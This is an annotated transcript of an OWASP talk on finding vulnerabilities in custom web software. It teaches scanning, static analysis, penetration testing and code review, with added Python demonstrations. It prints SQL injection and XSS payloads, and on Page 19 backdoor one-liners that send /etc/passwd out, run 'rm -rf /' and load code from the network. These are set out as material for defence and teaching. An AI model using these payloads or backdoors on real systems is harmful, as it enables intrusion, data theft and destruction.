The Art of Finding Flaws – Techniques for Finding Vulnerabilities in Custom Software

Jeff Williams, CEO, Aspect Security; Chair, OWASP Foundation
[email protected], 410-707-1487

The OWASP Foundation, http://www.owasp.org
4th Annual NTC ISSA InfoSec Nashville Conference, August 24, 2005

Copyright © 2004 - The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License.

TRANSCRIPT

Page 1: The Art of Finding Flaws – Techniques for Finding Vulnerabilities in Custom Software (title slide: author, venue, date and license as given above)

Page 2: The Future

[Figure: a mock "Software Facts" label, laid out like a food nutrition label, for a hypothetical future product.]

Software Facts

Expected Number of Users 15        Typical Roles per Instance 4
Modules 155                        Modules from Libraries 120

                                   % Vulnerability*
Cross Site Scripting 22                 65%
  Reflected 12
  Stored 10
SQL Injection 2
Buffer Overflow 5
Total Security Mechanisms 3
  Encryption 3
  Authentication 15                     95%
  Access Control 3
  Input Validation 233
  Logging 33
Modularity .035
Cyclomatic Complexity 323

* % Vulnerability values are based on typical use scenarios for this product. Your Vulnerability Values may be higher or lower depending on your software security needs:

                              Usage: Intranet   Internet
Cross Site Scripting     Less Than     10         5
  Reflected              Less Than     10         5
  Stored                 Less Than     10         5
SQL Injection            Less Than     20         2
Buffer Overflow          Less Than     20         2
Security Mechanisms                    10        14
  Encryption                            3        15

Ingredients: Sun Java 1.5 runtime, Sun J2EE 1.2.2, Jakarta log4j 1.5, Jakarta Commons 2.1, Jakarta Struts 2.0, Harold XOM 1.1rc4, Hunter JDOMv1

Page 3: Today

- Code is code: all sectors, all languages, all platforms, all computing models, all sizes, intra/extra/inter-net
- New types of vulnerabilities are rare
- The market doesn't value secure code: cheaper, faster only
- We trust code we shouldn't
- We don't have any idea whether our code is trustworthy or not

Page 4: Why Find Vulnerabilities?

- Nobody believes their software is vulnerable: "If the software works, then it must be secure"
- Finding flaws starts you on the path: Find Flaws -> Fix -> Find Flaws -> Improve -> Find Flaws -> Improve ...
- If you're not finding them, you're allowing them

Page 5: Software Is A Black Box

- Complex: millions of lines of code; layers of leaky abstractions; massively interconnected
- Compiled: difficult to reverse engineer; different on every platform
- Legal Protections: no peeking; we're not liable

Page 6: Key Vulnerabilities

A few serious common vulnerabilities...
- Broken Access Control
- Weak Authentication and Session Management
- SQL Injection
- Cross Site Scripting

For more information see...
- The Top Ten Most Critical Web Application Vulnerabilities (www.owasp.org/documentation/topten.html)
- A Guide to Building Secure Web Applications and Web Services (www.owasp.org/documentation/guide.html)

Page 7: SQL Injection Illustrated

[Figure: an application attack traversing a typical deployment. From the outside in: Firewall, Hardened OS, Web Server, App Server, a second Firewall, and the back end (Databases, Legacy Systems, Web Services, Directories, Human Resrcs, Billing). The Custom Code in the middle exposes the business functions (Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce, Bus. Functions). The APPLICATION ATTACK arrow is drawn at the Application Layer, above the Network Layer, and follows the path HTTP request -> SQL query -> DB Table -> HTTP response.]

    "SELECT * FROM users WHERE user='' OR 1=1--' AND pass='password'"

1. Application presents a login form to the attacker
2. Attacker sends an attack in the form data
3. Application forwards attack to the database in a SQL query
4. Database runs query containing attack and sends results to application
5. Application thinks login worked and sends welcome page: Successful Login, "Welcome, Alice"

Page 8: Scanning for SQL Injection

Method
- Use "signatures" to send malformed SQL commands
- Analyze responses to see if it "worked"
- Tools: Nessus, nikto, absinthe

Pros
- Requires only network access to the application
- Fast and easy to run

Cons
- May only exercise part of an application
- Prone to false alarms (false positives) and missed findings (false negatives)
- Results indicate a URL but not a line of code
- Can be problems with credentials, roles, and SSL
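The login bypass drawn on Page 7 and the signature-based scanning described on this page, as an added Python example that is not part of the slides or of any OWASP tool. The users table, the two login functions (string-concatenated and parameterized), the black-box wrapper that turns a login function into a "web application", the signature list and the database-error patterns are all constructed for the demonstration; the wrapper deliberately leaks the database error text, which is the kind of verbose error page a scanner keys on.

```python
import re
import sqlite3


def build_demo_db():
    """Constructed sample data (not from the slides): two accounts in a users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, pass TEXT, name TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "Alice"), ("bob", "hunter2", "Bob")],
    )
    conn.commit()
    return conn


def vulnerable_login(conn, user, pw):
    """Step 3 on the slide: form data is pasted straight into the SQL text, so
    user = "' OR 1=1--" turns the WHERE clause into user='' OR 1=1 and the
    trailing -- comments out the password check. Returns the display name or None."""
    query = "SELECT name FROM users WHERE user='%s' AND pass='%s'" % (user, pw)
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def safe_login(conn, user, pw):
    """Parameter binding keeps the attacker's input as data, never as SQL syntax."""
    row = conn.execute(
        "SELECT name FROM users WHERE user=? AND pass=?", (user, pw)
    ).fetchone()
    return row[0] if row else None


def make_app(login):
    """Wrap a login function as a black-box 'web application': parameters in,
    page text out. Echoing the database error message is a constructed choice
    that mimics the verbose error pages scanners rely on."""
    conn = build_demo_db()

    def app(params):
        try:
            name = login(conn, params.get("user", ""), params.get("pass", ""))
        except sqlite3.Error as exc:
            return "500 Internal Server Error: %s" % exc
        return "Welcome, %s" % name if name else "Login failed"

    return app


# Scanner "signatures": malformed SQL fragments sent into a form field, and the
# response patterns that indicate the fragment reached a database engine.
SIGNATURES = ["'", "' OR 1=1--", "' OR '1'='1", '" OR 1=1--']
DB_ERROR = re.compile(r"syntax error|unrecognized token|ORA-\d{5}|SQLSTATE|ODBC", re.I)


def scan_for_sqli(app, field="user"):
    """Send each signature in one field and classify the response against a
    baseline request. Returns (signature, evidence) pairs. An empty list means
    'nothing found', which is not the same as 'not vulnerable': a payload that
    does not change the response is a missed finding, not a clean bill."""
    baseline = app({field: "nosuchuser", "pass": "x"})
    findings = []
    for sig in SIGNATURES:
        body = app({field: sig, "pass": "x"})
        if DB_ERROR.search(body):
            findings.append((sig, "database error in response"))
        elif body != baseline and body.startswith("Welcome"):
            findings.append((sig, "authentication bypassed"))
    return findings


if __name__ == "__main__":
    for label, login in (("concatenated", vulnerable_login), ("parameterized", safe_login)):
        print(label, scan_for_sqli(make_app(login)))
```

Running it shows the two evidence types the slide mentions: a bare quote produces a database error in the response, and the OR 1=1-- payload returns "Welcome, Alice" (the first row in the table, exactly as in the illustration). The parameterized version yields no findings for any signature. Note that the scanner only knows the URL-level interface (field name and response text), which is why its results can name a page but never a line of code.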

Page 9: Static Analysis for SQL Injection

Method
- Automatically analyze source code for patterns
- Tools load source code, compile, and analyze

Pros
- Requires only the software baseline
- Fast and easy to run

Cons
- Can't factor in the runtime environment
- Prone to false alarms (false positives) and missed findings (false negatives)
- Results indicate a line of code but not a URL
- Doesn't find design problems
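The pattern-matching method described above, reduced to its core as an added Python example (not a real static-analysis tool and not from the slides): a single pass over Java source that remembers variables assigned from request.getParameter (the sources) and flags JDBC execute calls whose argument concatenates one of them (the sinks). The Java fragment is constructed for the demonstration; SAMPLE_JAVA, the regexes and the confidence labels are assumptions of this example.

```python
import re

# Constructed Java fragment (not from the slides): two tainted inputs, one query
# built by concatenation, one prepared statement, and one concatenation of a constant.
SAMPLE_JAVA = """\
String user = request.getParameter("user");
String pass = request.getParameter("pass");
Statement st = conn.createStatement();
ResultSet rs = st.executeQuery("SELECT * FROM users WHERE user='" + user + "' AND pass='" + pass + "'");
PreparedStatement ps = conn.prepareStatement("SELECT * FROM users WHERE user=? AND pass=?");
ps.setString(1, user);
ps.setString(2, pass);
ResultSet rs2 = ps.executeQuery();
String color = "blue";
st.execute("UPDATE prefs SET color='" + color + "'");
"""

# A "source" is an assignment from request data; a "sink" is a JDBC execute call.
SOURCE_RE = re.compile(r"(\w+)\s*=\s*request\.getParameter\(")
SINK_RE = re.compile(r"\.(executeQuery|executeUpdate|execute)\((.*)\)\s*;")
STRING_LITERAL_RE = re.compile(r'"[^"]*"')


def find_sql_injection(java_source):
    """Intra-procedural, single-file taint check. Returns one tuple per suspicious
    sink: (line number, sink method, tainted variables used, confidence).
    'high' = request data concatenated into the query; 'low' = concatenation of
    something this pass could not trace back to a request (a human must look)."""
    tainted = set()
    findings = []
    for lineno, line in enumerate(java_source.splitlines(), 1):
        src = SOURCE_RE.search(line)
        if src:
            tainted.add(src.group(1))
        sink = SINK_RE.search(line)
        if not sink:
            continue
        # Blank out string literals so a column named like a variable does not count.
        arg = STRING_LITERAL_RE.sub('""', sink.group(2))
        if "+" not in arg and "getParameter" not in arg:
            continue  # constant query text, or a prepared statement with no text at all
        used = sorted(v for v in tainted if re.search(r"\b%s\b" % re.escape(v), arg))
        if used or "getParameter" in arg:
            findings.append((lineno, sink.group(1), used, "high"))
        else:
            findings.append((lineno, sink.group(1), [], "low"))
    return findings


if __name__ == "__main__":
    for lineno, sink, vars_used, confidence in find_sql_injection(SAMPLE_JAVA):
        print("line %d: %s(...) concatenates %s [%s]" % (lineno, sink, vars_used or "untainted data", confidence))
```

The output names line numbers, never URLs, which is the mirror image of the scanner's limitation. The "low" finding on the last line is the false-alarm side of the slide's caveat: a constant is concatenated, so the query is safe, but the tool cannot know that without tracing where color came from. A real tool does the same thing across methods and files and with a proper parser; the pass here stops at one method and one line of context, so anything assigned through a helper method or a field would be a missed finding.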

Page 10: Penetration Testing for SQL Injection

Method
- Custom attacks by an expert security tester
- Use OWASP WebScarab to craft custom attacks
- Expert analyzes responses to see if the attack worked

Pros
- Open source tools available
- Recommend an internal team

Cons
- Requires expertise in security, software, and SQL
- Difficult to exercise the entire application
- Tester may not be able to determine success

Page 11: Code Review for SQL Injection

Method
- Reviewer analyzes code for patterns
- Use tools to view the baseline in different ways
- Examine mechanisms and common vulnerability areas

Pros
- Cost-effective
- Can examine the entire baseline

Cons
- Can't factor in the runtime environment
- Requires skills in software and security

Page 12: Security Analysis Techniques

[Figure: a 2x2 matrix of analysis techniques.]

              Find Vulnerabilities Using      Find Vulnerabilities Using
              the Running Application         the Source Code

Automated     Vulnerability Scanning          Static Code Analysis

Manual        Penetration Testing             Code Review

Combining All Four Techniques is Most Effective

Page 13: Vulnerability Patterns

    import javax.servlet.http.HttpServletRequest;
    import org.apache.struts.action.ActionForm;

    public class DamagedStrutsForm extends ActionForm {

        public void doForm( HttpServletRequest request ) {
            UserBean u = session.getUserBean();
            u.setName( request.getParameter("name") );
            u.setFavoriteColor( request.getParameter("color") );
        }

        public boolean validate( HttpServletRequest request ) {
            try {
                if ( request.getParameter("Name").indexOf("<scri") != -1 ) {
                    logger.log( "Script detected" );
                    return false;
                }
            } catch( Exception e ) {}
            return true;
        }
    }

Callouts on the slide, each pointing at a line of the code above:
- Failure to Validate: doForm() stores "name" in the bean without any check of its own
- Blacklist Validation: validate() only looks for the literal "<scri"; any other tag, or a different case, passes
- Fail Open: every exception in validate() (a missing parameter, for instance) is swallowed and the input is accepted
- Failure to Validate: "color" is never checked at all
- Time of Check, Time of Use: validate() inspects a parameter at one time and doForm() reads the request again later; note that it checks "Name" while doForm() reads "name"
- Failure to Validate: the result is that nothing reaching the bean has actually been validated
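The blacklist and fail-open patterns from the Struts example, rewritten as an added Python example (not from the slides) beside the positive, fail-closed form that the slide implicitly argues for. blacklist_validate mirrors the slide's validate() method one for one; NAME_RE is a constructed allowlist policy for a person's name and is an assumption of this example, as are the test inputs.

```python
import re


def blacklist_validate(params):
    """Port of the slide's validate(): reject only when the 'Name' field contains
    the literal "<scri"; swallow every exception and accept (fail open)."""
    try:
        return "<scri" not in params["Name"]
    except Exception:
        return True


# Positive (allowlist) rule for a person's name: a letter followed by up to 49
# letters, spaces, apostrophes, dots or hyphens. A constructed policy, not from the slides.
NAME_RE = re.compile(r"[A-Za-z][A-Za-z .'\-]{0,49}")


def allowlist_validate(params):
    """Accept only what a name is allowed to look like; a missing field, a wrong
    type or a non-match is rejected (fail closed). The key checked ('name') is
    the same key the form handler later reads, so there is no check/use mismatch."""
    try:
        return NAME_RE.fullmatch(params["name"]) is not None
    except Exception:
        return False


def evaluate(cases):
    """Run both validators over (description, params) pairs and return
    (description, blacklist verdict, allowlist verdict) so the bypasses line up."""
    return [(desc, blacklist_validate(p), allowlist_validate(p)) for desc, p in cases]


# Constructed inputs: each one gets past the blacklist in a different way.
CASES = [
    ("benign name", {"Name": "Alice O'Neil", "name": "Alice O'Neil"}),
    ("exact blacklist token", {"Name": "<script>alert(1)</script>", "name": "<script>alert(1)</script>"}),
    ("case change", {"Name": "<SCRIPT>alert(1)</SCRIPT>", "name": "<SCRIPT>alert(1)</SCRIPT>"}),
    ("different tag", {"Name": "<img src=x onerror=alert(1)>", "name": "<img src=x onerror=alert(1)>"}),
    ("field name mismatch", {"name": "<script>alert(1)</script>"}),
    ("wrong type", {"Name": ["<script>"], "name": ["<script>"]}),
]

if __name__ == "__main__":
    for desc, blacklist_ok, allowlist_ok in evaluate(CASES):
        print("%-24s blacklist accepts: %-5s allowlist accepts: %s" % (desc, blacklist_ok, allowlist_ok))
```

Only the exact token the slide's code looks for is rejected by the blacklist; changing case, using a different tag, omitting the capitalised "Name" parameter (so the lowercase "name" that doForm() reads is never examined) or sending an unexpected type all sail through, the last two because the catch block turns an error into acceptance. The allowlist rejects every one of them and accepts the benign name, and its failure mode on surprise input is rejection rather than acceptance.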

Page 14: A Change In Perspective

Think like an attacker!
- Understand how the application works
- Especially the security mechanisms
- How does the application make security decisions?

The easy part? Test and analyze for a single vulnerability.

The hard part? Do an entire application for all types of vulnerabilities.

Page 15: Getting Started

- Adopt the OWASP Top Ten: set the bar
- Spot check a few applications: Are your security mechanisms easy to understand? Are you doing validation, error handling, logging, etc.?
- Get security out in the open!

Come to my talk later to find out more!!!

Page 16: OWASP Can Help

Open Web Application Security Project
- Nonprofit Foundation
- All materials available under approved open source licenses
- Dozens of projects, over 50 chapters worldwide, thousands of participants, and millions of hits a month

OWASP is dedicated to finding and fighting the causes of insecure software

Page 17: OWASP Supports Vulnerability Analysis

- OWASP Top Ten: set priorities, get management buy-in
- OWASP Guide: 300 page book for application security
- OWASP Testing Guide: test/analysis methods for application security
- OWASP WebScarab: web application & web service penetration tool

Page 18: Some of What You'll Find at OWASP

Community: Local Chapters, Translations, Conferences, Mailing Lists, Papers and more...

Documentation: Guide, Top Ten, Testing, Legal, AppSec FAQ and more...

Tools: WebGoat, WebScarab, Stinger, DotNet and more...

All free and open source. We encourage your company to support us by becoming a member.

Page 19: What Could a Malicious Developer Do?

Trojan Horse runs for admin:

    if ( System.getCurrentUser().getName().equals( "admin" ) )
        Runtime.exec( "sendmail [email protected] < /etc/passwd" );

Secret trigger removes all files on root partition:

    if( req.getParameter( "codeword" ).equals( "eagle" ) )
        Runtime.exec( "rm -rf /" );

Randomly corrupt data one time in 100:

    if ( Math.random() < .01 ) bean.setValue( "corrupt" );

Load and execute code from remote server:

    ((A)(ClassLoader.getSystemClassLoader().defineClass (null,readBytesFromNetwork(),0,422).newInstance())).attack();

Make backdoor look like inadvertent mistake:

    if ( input < 0 ) throw new RuntimeException( "Input error" );

Impossible to tell malicious from mistake

Who wrote the libraries your application uses?
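The slide's examples are one-liners, and the question it leaves open is what a code reviewer can do about them. This added Python example (not from the slides, and not a real review tool) runs a short list of review prompts over a constructed Java fragment built around the slide's five cases: calls that run OS commands, load code at runtime, branch on a random draw, compare a request parameter to a hard-coded trigger, or branch on a privileged user name. SAMPLE_JAVA and REVIEW_PATTERNS are assumptions of this example. The fifth case on the slide, the backdoor dressed as an input check, matches none of the prompts, which is the slide's point: the patterns narrow the reading, they do not replace it.

```python
import re

# Constructed Java wrapper around the slide's one-liners. The last line is the
# "looks like an inadvertent mistake" case, which no textual pattern can flag.
SAMPLE_JAVA = """\
if ( System.getCurrentUser().getName().equals( "admin" ) )
    Runtime.exec( "sendmail someone < /etc/passwd" );
if ( req.getParameter( "codeword" ).equals( "eagle" ) )
    Runtime.exec( "rm -rf /" );
if ( Math.random() < .01 ) bean.setValue( "corrupt" );
((A)(ClassLoader.getSystemClassLoader().defineClass (null,readBytesFromNetwork(),0,422).newInstance())).attack();
if ( input < 0 ) throw new RuntimeException( "Input error" );
"""

# Each pattern is a review prompt, not proof of malice: every hit still needs a
# human to ask "why is this here, and who committed it?".
REVIEW_PATTERNS = [
    (re.compile(r"Runtime\.(getRuntime\(\)\.)?exec\s*\("), "executes an OS command"),
    (re.compile(r"defineClass\s*\(|newInstance\s*\("), "loads or instantiates code at runtime"),
    (re.compile(r"Math\.random\(\)\s*[<>]"), "behaviour gated on a random draw"),
    (re.compile(r'getParameter\(\s*"\w+"\s*\)\s*\.equals\(\s*"[^"]+"\s*\)'), "hard-coded trigger value in a request parameter"),
    (re.compile(r'getName\(\)\s*\.equals\(\s*"(admin|root|administrator)"\s*\)'), "branch taken only for a privileged user"),
]


def review_for_backdoors(java_source):
    """Return (line number, [reasons]) for every line that matches a review prompt."""
    findings = []
    for lineno, line in enumerate(java_source.splitlines(), 1):
        reasons = [why for rx, why in REVIEW_PATTERNS if rx.search(line)]
        if reasons:
            findings.append((lineno, reasons))
    return findings


if __name__ == "__main__":
    lines = SAMPLE_JAVA.splitlines()
    for lineno, reasons in review_for_backdoors(SAMPLE_JAVA):
        print("line %d: %s\n    %s" % (lineno, "; ".join(reasons), lines[lineno - 1].strip()))
```

Six of the seven lines are flagged; line 7 is not, and nothing short of knowing what negative input means for this application would let a reviewer tell whether that throw is a bug or a kill switch. Run over a third-party library rather than your own code, the same prompts give a first answer to the closing question on the slide: they show where the library talks to the OS, loads code, or keys behaviour on a magic value, which is where a reviewer should start reading.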

Page 20: Questions & Answers